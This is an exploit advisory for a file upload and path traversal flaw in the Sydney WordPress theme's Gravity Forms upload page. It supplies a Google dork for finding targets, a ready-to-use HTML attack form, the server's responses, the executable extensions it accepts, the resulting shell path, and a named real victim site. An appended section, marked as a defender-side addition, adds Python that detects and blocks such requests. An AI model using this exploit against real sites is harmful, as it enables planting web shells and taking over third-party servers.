#################################################################################################
# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''
# Exploit HTML Code :
<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>
<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
Exploit : TARGET/?gf_page=upload
We cannot upload directly with this exploit, but we can upload our file to the site with the remote file exploiter (the HTML form above).
# Error response : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
# Successful response : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf
# You do not need to rename your file to _input__kingskrupellos.php5 yourself.
# Just choose a file from your machine and upload it with one of the aforementioned extensions.
# For example : a file named yourfilename.php will be stored on the server [ site ] like this. /_input__kingskrupellos.php5
# Example Usage for Windows :
# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP
# 127.0.0.1/athemeswordpressexploiter.html
# Path : TARGET/_input__kingskrupellos.php5
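# The following is an added defender-side example and is not part of the original advisory, the Sydney theme or Gravity Forms. It takes the request shape described above (a POST to ?gf_page=upload carrying form_id, gform_unique_id, name and field_id) and shows two things: a request check that flags the traversal sequences and the executable extensions (.php5, .phtml, .html and so on) that the advisory relies on, and a hardened way to build the temp path that rejects non-numeric or non-alphanumeric ids, keeps only the basename, enforces an extension allowlist and verifies the resolved path stays inside the upload directory. The SAFE_EXTENSIONS allowlist and the SAMPLE_REQUESTS values are constructed for this example; the first sample reproduces the field values from the HTML form above.

```python
import os
import re
from urllib.parse import parse_qs

# Extensions the advisory lists as accepted by the upload page. The ones that a
# web server or browser will execute or render must never reach the upload dir.
DANGEROUS_EXTENSIONS = {"php", "php5", "phtml", "html", "htm", "fla"}
# Allowlist a hardened handler would use (an assumption for this example, not
# Gravity Forms' own configuration).
SAFE_EXTENSIONS = {"jpg", "gif", "png", "pdf", "txt"}

# "../" or "..\" anywhere, or a URL-encoded dot-dot.
TRAVERSAL = re.compile(r"\.\.[/\\]|%2e%2e", re.IGNORECASE)
ID_PATTERN = re.compile(r"[A-Za-z0-9]+")


def check_upload_request(query, fields):
    """Inspect one multipart POST aimed at ?gf_page=upload.

    query  -- the raw URL query string
    fields -- dict of form field name -> value (the file body itself is not needed)
    Returns a list of findings; an empty list means the request looks benign.
    """
    findings = []
    if parse_qs(query).get("gf_page", [""])[0] != "upload":
        return findings  # some other page; the upload handler is not involved

    form_id = fields.get("form_id", "")
    unique_id = fields.get("gform_unique_id", "")
    name = fields.get("name", "")

    # Both ids end up in the temp path, so they must stay strictly alphanumeric.
    if not form_id.isdigit():
        findings.append(f"form_id is not numeric: {form_id!r}")
    if not ID_PATTERN.fullmatch(unique_id):
        findings.append(f"gform_unique_id is not alphanumeric: {unique_id!r}")
    for key in ("form_id", "gform_unique_id", "name"):
        if TRAVERSAL.search(fields.get(key, "")):
            findings.append(f"path traversal sequence in {key}")

    # Check every extension in the name so shell.php.jpg is caught too.
    exts = os.path.basename(name.replace("\\", "/")).lower().split(".")[1:]
    if any(ext in DANGEROUS_EXTENSIONS for ext in exts):
        findings.append(f"executable or renderable extension in filename: {name!r}")
    elif not exts or exts[-1] not in SAFE_EXTENSIONS:
        findings.append(f"extension not on allowlist: {name!r}")
    return findings


def safe_temp_path(upload_dir, form_id, unique_id, name):
    """Build the temp file path the way a hardened handler would.

    Returns None when any input is rejected; otherwise an absolute path that is
    guaranteed to resolve inside upload_dir.
    """
    if not form_id.isdigit() or not ID_PATTERN.fullmatch(unique_id):
        return None
    base = os.path.basename(name.replace("\\", "/"))
    exts = base.lower().split(".")[1:]
    if not exts or exts[-1] not in SAFE_EXTENSIONS or any(e in DANGEROUS_EXTENSIONS for e in exts):
        return None
    root = os.path.realpath(upload_dir)
    candidate = os.path.realpath(os.path.join(root, form_id, f"{unique_id}_input_{base}"))
    # Final containment check: realpath collapses any ".." that slipped through.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed sample requests: the first reproduces the field values from the
# advisory's HTML form, the others are a benign upload, a double-extension
# filename, and a request to a different page that the check must ignore.
SAMPLE_REQUESTS = {
    "advisory_form": ("gf_page=upload", {"form_id": "../../../", "name": "kingskrupellos.html",
                                         "gform_unique_id": "../../", "field_id": ""}),
    "benign_image": ("gf_page=upload", {"form_id": "3", "name": "photo.jpg",
                                        "gform_unique_id": "a1b2c3d4", "field_id": "7"}),
    "double_extension": ("gf_page=upload", {"form_id": "3", "name": "shell.php.jpg",
                                            "gform_unique_id": "a1b2c3d4", "field_id": "7"}),
    "other_page": ("gf_page=preview", {"form_id": "../../../", "name": "x.html",
                                       "gform_unique_id": "../../"}),
}


def scan_requests(requests=SAMPLE_REQUESTS):
    """Run the check over a mapping of label -> (query, fields)."""
    return {label: check_upload_request(query, fields)
            for label, (query, fields) in requests.items()}


if __name__ == "__main__":
    for label, findings in scan_requests().items():
        print(label, "->", findings or "ok")
```

# The request check is what a WAF rule or a log-replay script would apply; the containment check in safe_temp_path is the part that closes the hole even when an earlier filter is bypassed, because the path is resolved before the write and compared against the upload root.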
#################################################################################################
# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################